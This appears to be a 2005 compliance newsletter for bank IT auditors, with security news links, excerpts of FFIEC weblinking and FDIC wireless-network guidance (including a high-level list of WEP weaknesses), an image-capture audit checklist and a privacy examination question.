VISTA - Does {custom4} need an affordable internal or external penetration-vulnerability test?  R. Kinney Williams & Associates provides the independence required by the FFIEC IT Examination Manual.  We are IT auditors and do not sell hardware or software like many IT testing companies and consultants. In addition, we have over 30 years experience auditing IT operations for financial institutions, which includes 21 years examination experience.  For more information, give Kinney Williams a call today at 806-798-7119 or visit http://www.internetbankingaudits.com/.  

FYI - Securing the Person at the Keyboard - Most information security incidents can be traced to employees. Although the 2004 Computer Security Institute (CSI)/U.S. Federal Bureau of Investigation (FBI) Computer Crime and Security Survey reports that unauthorized use of computer systems is declining, it remains costly for organizations. According to the survey, insider abuse of Internet access made up 59 percent of financial losses from misuse of computer systems, while 37 percent of losses stemmed from unauthorized access to information. Such insider misuse raises a host of security issues and calls for greater control. http://www.theiia.org/itaudit/index.cfm?fuseaction=print&fid=5587

FYI - Flaw threatens T-Mobile voice mail leaks - A convenient voice mail feature has likely opened u
p many T-Mobile subscribers' voice mail boxes to anyone armed with a simple hack, the embattled cellular service provider acknowledged Thursday. http://news.zdnet.com/2100-1009_22-5589608.html

FYI - Hackers attack Japanese government - The Japanese Government has suffered a spate of cyberattacks on two of its Web sites this week, according to reports. http://www.zdnet.co.uk/print/?TYPE=story&AT=39189080-39020375t-10000025c

FYI - Common Web Application Vulnerabilities - While the World Wide Web has evolved into a critical delivery pipeline for companies to interact with their customers, partners and employees, it also may also provide a back door through your security perimeter. Web application vulnerabilities provide the potential for an unauthorized party to gain access to critical and proprietary information, use resources inappropriately, interrupt business or commit fraud. http://www.computerworld.com/printthis/2005/0,4814,99981,00.html

FYI - ChoicePoint to tighten data access after ID theft - As ChoicePoint Inc. continues this week to notify some 145,000 consumers of possible identity theft after it sold consumer information to fraudulent businesses last year, the company said it's beginning to double-check its existing clients to ensure they are legitimate businesses. http://www.computerworld.com/printthis/2005/0,4814,99945,00.html

FYI - Collins calls GSA on carpet for personal data snafu - In letters sent late yesterday to the General Services Administration and Bank of America Corp., Sen. Susan Collins expressed outrage that neither the agency nor the bank had chosen to inform federal employees in December that their personal information might be at risk. http://www.gcn.com/vol1_no1/daily-updates/35170-1.html

FYI - The Federal Reserve Board on Tuesday requested public comment on a proposal to amend its Regulation CC to set forth rules governing remotely created checks. In place of a signature, a remotely created check generally bears a statement that the customer authorized the check or bears the customer's printed or typed name. www.federalreserve.gov/boarddocs/press/bcreg/2005/200503012/default.htm 

FYI - British banks in talks to fight ID theft - Major British banks may soon tighten their security in a bid to protect customers from identity theft. http://news.com.com/2102-1029_3-5608885.html?tag=st.util.print

FYI - Job-Hopping in Silicon Valley: Some Evidence Concerning the Micro-Foundation of a High Technology Cluster - In Silicon Valley's computer cluster, skilled employees are reported to move rapidly between competing firms. If true, this job-hopping facilitates the reallocation of resources towards firms with superior innovations, but it also creates human capital externalities that reduce incentives to invest in new knowledge. www.federalreserve.gov/pubs/feds/2005/200511/200511pap.pdf 

Return to the top of the newsletter

WEB SITE COMPLIANCE - We continue our review of the FFIEC interagency statement on "Weblinking: Identifying Risks and Risk Management Techniques."  (Part 8 of 10)

B. RISK MANAGEMENT TECHNIQUES

Implementing Weblinking Relationships

The strategy that financial institutions choose when implementing weblinking relationships should address ways to avoid customer confusion regarding linked third-party products and services. This includes disclaimers and disclosures to limit customer confusion and a customer service plan to address confusion when it occurs.

Disclaimers and Disclosures

Financial institutions should use clear and conspicuous webpage disclosures to explain their limited role and responsibility with respect to products and services offered through linked third-party websites. The level of detail of the disclosure and its prominence should be appropriate to the harm that may ensue from customer confusion inherent in a particular link. The institution might post a disclosure stating it does not provide, and is not responsible for, the product, service, or overall website content available at a third-party site. It might also advise the customer that its privacy polices do not apply to linked websites and that a viewer should consult the privacy disclosures on that site for further information. The conspicuous display of the disclosure, including its placement on the appropriate webpage, by effective use of size, color, and graphic treatment, will help ensure that the information is noticeable to customers. For example, if a financial institution places an otherwise conspicuous disclosure at the bottom of its webpage (requiring a customer to scroll down to read it), prominent visual cues that emphasize the information's importance should point the viewer to the disclosure.

In addition, the technology used to provide disclosures is important. While many institutions may simply place a disclaimer notice on applicable webpages, some institutions use "pop-ups," or intermediate webpages called "speedbumps," to notify customers they are leaving the institution's website. For the reasons described below, financial institutions should use speedbumps rather than pop-ups if they choose to use this type of technology to deliver their online disclaimers.

A "pop up" is a screen generated by mobile code, for example Java or Active X, when the customer clicks on a particular hyperlink. Mobile code is used to send small programs to the user's browser. Frequently, those programs cause unsolicited messages to appear automatically on a user's screen. At times, the programs may be malicious, enabling harmful viruses or allowing unauthorized access to a user's personal information. Consequently, customers may reconfigure their browsers or install software to block disclosures delivered via mobile codes.

In contrast, an intermediate webpage, or "speedbump," alerts the customer to the transition to the third-party website. Like a pop-up, a speedbump is activated when the customer clicks on a particular weblink. However, use of a speedbump avoids the problems of pop-up technology, because the speedbump is not generated externally using mobile code, but is created within the institution's operating system, and cannot be disabled by the customer.

Return to the top of the newsletter

INFORMATION TECHNOLOGY SECURITY - We continue our coverage of the FDIC's "Guidance on Managing Risks Associated With Wireless Networks and Wireless Customer Access."

PART I. Risks Associated with Wireless Internal Networks

Financial institutions are evaluating wireless networks as an alternative to the traditional cable to the desktop network. Currently, wireless networks can provide speeds of up to 11Mbps between the workstation and the wireless access device without the need for cabling individual workstations. Wireless networks also offer added mobility allowing users to travel through the facility without losing their network connection. Wireless networks are also being used to provide connectivity between geographically close locations as an alternative to installing dedicated telecommunication lines.

Wireless differs from traditional hard-wired networking in that it provides connectivity to the network by broadcasting radio signals through the airways. Wireless networks operate using a set of FCC licensed frequencies to communicate between workstations and wireless access points. By installing wireless access points, an institution can expand its network to include workstations within broadcast range of the network access point.

The most prevalent class of wireless networks currently available is based on the IEEE 802.11b wireless standard. The standard is supported by a variety of vendors for both network cards and wireless network access points. The wireless transmissions can be encrypted using "Wired Equivalent Privacy" (WEP) encryption. WEP is intended to provide confidentiality and integrity of data and a degree of access control over the network. By design, WEP encrypts traffic between an access point and the client. However, this encryption method has fundamental weaknesses that make it vulnerable. WEP is vulnerable to the following types of decryption attacks:

1)  Decrypting information based on statistical analysis;

2)  Injecting new traffic from unauthorized mobile stations based on known plain text;

3)  Decrypting traffic based on tricking the access point;

4)  Dictionary-building attacks that, after analyzing about a day's worth of traffic, allow real-time automated decryption of all traffic (a dictionary-building attack creates a translation table that can be used to convert encrypted information into plain text without executing the decryption routine); and

5)  Attacks based on documented weaknesses in the RC4 encryption algorithm that allow an attacker to rapidly determine the encryption key used to encrypt the user's session).

Return to the top of the newsletter

IT SECURITY QUESTION:  Image capturing operations:

a. Are there automated journals and audit trails that document access to and modification of images?
b. Are there controls to ensure stored images cannot be altered, erased or lost?
c. Have procedures been established to prevent the destruction of original documents before it is determined that the images are readable?
d. Are there procedures to address traditional controls (such as date stamps, control numbers, and review signatures)?
e. Are there controls to prevent faulty images, improper indexing, and incomplete or forged documents from being entered into the system?
f. Is a backup copy of the image medium stored off-site?
g. Is there a periodic evaluation of legal issues?

Return to the top of the newsletter

INTERNET PRIVACY - We continue our series listing the regulatory-privacy examination questions.  When you answer the question each week, you will help ensure compliance with the privacy regulations.

Content of Privacy Notice

10)  Does the institution list the following categories of nonpublic personal information that it discloses, as applicable, and a few examples of each, or alternatively state that it reserves the right to disclose all the nonpublic personal information that it collects:

a)  information from the consumer;

b)  information about the consumer's transactions with the institution or its affiliates;

c)  information about the consumer's transactions with nonaffiliated third parties; and

d)  information from a consumer reporting agency? [§6(c)(2)]